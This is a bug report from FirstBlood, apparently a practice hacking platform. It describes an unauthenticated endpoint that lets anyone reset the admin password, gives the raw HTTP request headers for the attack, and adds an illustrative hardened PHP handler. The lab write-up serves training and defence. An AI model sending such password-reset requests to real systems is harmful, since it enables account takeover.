FirstBlood-#1000 Change Password of admin user
This issue was discovered on FirstBlood v3

On 2022-12-08, ayush1098 Level 8 reported:

Hello Team,


From previous hackevent reports, I gathered the /drpanel/drapi/editpassword.php endpoint and it works in this version also. I can change the password of any user (admin in this case) and there is no CSRF protection on this page, so we can exploit it easily.

Steps To Reproduce:

  1. Send this request in Burp Suite and you will get the password in the response.
POST /drpanel/drapi/editpassword.php HTTP/1.1
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7
Connection: close
Content-Length: 29


Note the username parameter and the Content-Length in the above request.


Anyone can change the admin password and can manipulate the user data.

Thanks & Regards Ayush Singh


Endpoint: /drpanel/drapi/editpassword.php

Parameter: NA

Payload: NA

FirstBlood ID: 52
Vulnerability Type: Auth issues

The endpoint /drpanel/drapi/editpassword.php still allows an unauthenticated user to modify the password of any account if the username is known. Compared with previous versions, the username was renamed from drAdmin to admin.
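As an added illustration that is not FirstBlood's own code, the following hypothetical hardened PHP handler shows the checks whose absence the report and the platform description point at: authentication (the actual defect), authorization, and the CSRF token the administrator rates as informative. It assumes session keys user_id, username and role set at login, a PDO handle in $db, and POST fields username, password and csrf_token; the real field names are not shown on this page.

```php
<?php
// Hypothetical hardened replacement for an endpoint such as /drpanel/drapi/editpassword.php.
// Not FirstBlood's code. Assumes a login step that stores user_id, username and role in
// the session, a PDO connection in $db, and POST fields "username", "password", "csrf_token".
declare(strict_types=1);
session_start();

function deny(int $status, string $msg): void { http_response_code($status); echo $msg; exit; }

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    deny(405, 'method not allowed');
}
// 1. Authentication: the reported bug is that nobody checked who is asking.
if (empty($_SESSION['user_id'])) {
    deny(401, 'login required');
}
// 2. CSRF: compare a per-session token (issued when the form is rendered) in constant time.
$token = $_POST['csrf_token'] ?? '';
if (!is_string($token) || empty($_SESSION['csrf_token'])
    || !hash_equals($_SESSION['csrf_token'], $token)) {
    deny(403, 'bad csrf token');
}
// 3. Authorization: a user may change only their own password unless they are an admin.
$target  = $_POST['username'] ?? '';
$isAdmin = ($_SESSION['role'] ?? '') === 'admin';
if (!is_string($target) || (!$isAdmin && $target !== $_SESSION['username'])) {
    deny(403, 'not allowed to change another account');
}
// 4. Never echo the password back; store only a hash.
$new = $_POST['password'] ?? '';
if (!is_string($new) || strlen($new) < 12) {
    deny(400, 'password too short');
}
$hash = password_hash($new, PASSWORD_DEFAULT);
$stmt = $db->prepare('UPDATE users SET password_hash = ? WHERE username = ?');
$stmt->execute([$hash, $target]);
if ($stmt->rowCount() !== 1) {
    deny(404, 'unknown user');
}
// Rotate the CSRF token and the session id after a sensitive change.
$_SESSION['csrf_token'] = bin2hex(random_bytes(32));
session_regenerate_id(true);
echo 'password updated';
```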

Report Feedback


Creator & Administrator

Congratulations, you were the first to discover this bug! The lack of CSRF protection on this endpoint is something considered informative, as the attacker doesn't need CSRF to gain access (yes, they could lock the admin out, but they could easily regain access).